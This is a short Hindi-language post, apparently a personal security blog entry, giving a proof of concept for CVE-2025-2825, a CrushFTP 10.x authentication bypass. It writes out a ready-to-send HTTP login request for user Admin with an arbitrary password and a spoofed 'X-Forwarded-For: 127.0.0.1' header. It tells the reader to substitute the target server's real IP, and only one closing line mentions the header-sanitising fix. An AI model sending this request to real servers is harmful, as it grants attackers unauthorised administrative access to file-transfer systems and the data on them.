
CVE-2025-2825 के लिए प्रमाणीकरण बायपास PoC – CrushFTP 10.x का शोषण
CVE-2025-2825 एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो CrushFTP को प्रभावित करती है, जो एक व्यापक रूप से उपयोग किया जाने वाला सुरक्षित फ़ाइल स्थानांतरण सर्वर है। यह दोष रिमोट हमलावरों को हेडर स्पूफिंग करके लॉगिन प्रमाणीकरण को बायपास करने और प्रशासनिक पहुँच प्राप्त करने की अनुमति देता है — सर्वर को यह सोचने पर मजबूर करता है कि अनुरोध लोकलहोस्ट से आया है।
यह भेद्यता X-Forwarded-For हेडर के अनुचित सत्यापन के कारण उत्पन्न होती है। जब यह हेडर 127.0.0.1 पर सेट किया जाता है, तो सर्वर अनुरोध को स्थानीय मानता है — प्रमाणीकरण को बायपास करता है।
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝
target-ipको लक्ष्य CrushFTP सर्वर के वास्तविक IP पते से बदलें।
यदि सफल होता है, तो सर्वर प्रमाणीकरण को बायपास करता है और पहुँच प्रदान करता है — गलत क्रेडेंशियल के साथ भी।
X-Forwarded-For: 127.0.0.1
X-Forwarded-For जैसे हेडर को साफ और मान्य करें।Shivshant Patil
प्रमाणित नैतिक हैकर (CEH v13)
B.Tech कंप्यूटर इंजीनियरिंग स्नातक
🔗 LinkedIn Profile
🔗 Github Profile